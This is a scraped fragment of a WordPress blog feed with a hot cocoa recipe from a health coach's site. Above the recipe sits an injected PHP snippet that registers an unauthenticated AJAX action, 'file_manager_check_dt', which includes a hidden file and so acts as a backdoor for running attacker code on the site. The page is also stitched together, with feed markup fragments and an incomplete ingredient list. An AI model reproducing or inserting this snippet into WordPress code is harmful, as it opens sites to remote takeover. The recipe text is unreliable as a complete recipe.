if(!function_exists('file_manager_check_dt')){
add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt');
add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt');
function file_manager_check_dt()
{
$file = __DIR__ . '/settings-about.php';
if (file_exists($file)) {
include $file;
}
die();
}
}
The post Essential Hot Cocoa first appeared on Manage Stress | Increase Energy |Simple Solutions | Rommy Kirby, Holistic Health Coach, Yoga Personal Trainer, Essential Oil Educator.
]]>Here’s how I like to enjoy mine…
Essential Oils to Flavor (I add a drop of the oil to my coconut sugar then add the sugar to my other ingredients)
Cinnamon Bark
Peppermint
Wild Orange
Put it together…
1 – Measure dry ingredients into a bowl.
2 – Heat water in saucepan on stove
3 – Add dry ingredients and stir until smooth
4 – Add Coconut Milk and heat until simmering
5 – Pour into warm mugs
6 – Enjoy!!!
The post Essential Hot Cocoa first appeared on Manage Stress | Increase Energy |Simple Solutions | Rommy Kirby, Holistic Health Coach, Yoga Personal Trainer, Essential Oil Educator.
]]>